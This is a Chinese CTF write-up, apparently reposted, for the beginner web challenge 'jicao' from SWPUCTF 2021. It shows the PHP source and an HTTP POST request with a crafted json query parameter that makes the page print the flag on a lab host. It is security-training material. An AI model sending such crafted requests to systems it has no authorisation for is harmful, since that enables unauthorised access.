文章总结: ThisdocumentpresentsasolutionfortheSWPUCTF2021CTFchallenge’jicao’whichinvolvesexploitingaPHPvulnerabilitytoextractaflag.ThechallengerequiressendingaPOSTrequestwithid=’wllmNB’andincludingaJSONparameterintheURLwithx=’wllm’.ThewriteupincludesthePHPcodesnippet,explainstherequirements,andprovidesanexampleHTTPrequestwithheaderstosuccessfullyretrievetheflag. 综合评分: 80 文章分类: CTF,WEB安全
[SWPUCTF 2021 新生赛]jicao
原创
R0seK1ller
蟹堡安全团队
2025年12月16日 22:01 浙江
免责声明
本CTF题解(WP)仅供安全技术研究与教育交流之用,作者不对读者依据本文进行的任何操作承担直接或间接责任。解题过程涉及的技术细节可能触及目标系统漏洞,请务必在合法授权环境或靶机中复现,严禁用于未授权的渗透、破坏或牟利行为。因环境差异、操作失误或理解偏差导致的任何损失,作者及发布平台概不负责。文中引用的工具、脚本与资源均保持原许可证,请遵守对应开源协议。若内容涉侵权或敏感信息,请及时联系删除。阅读即视为同意自行承担全部风险与合规义务。
<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm")
{echo$flag;}
?>
1.$id=$_POST[‘id’] && $id==”wllmNB” 需要通过POST方式发送请求,请求数据id=wllmNB
2.$json=json_decode($_GET[‘json’],true)&&$json[‘x’]==”wllm”,查询字符串中要有json参数且其数据格式为json字符串,解析后里面要存在x=wllm
POST/?json={"x":"wllm"}HTTP/1.1
Host: node7.anna.nssctf.cn:24933
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 9
id=wllmNB
查看原文:《[SWPUCTF 2021 新生赛]jicao》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论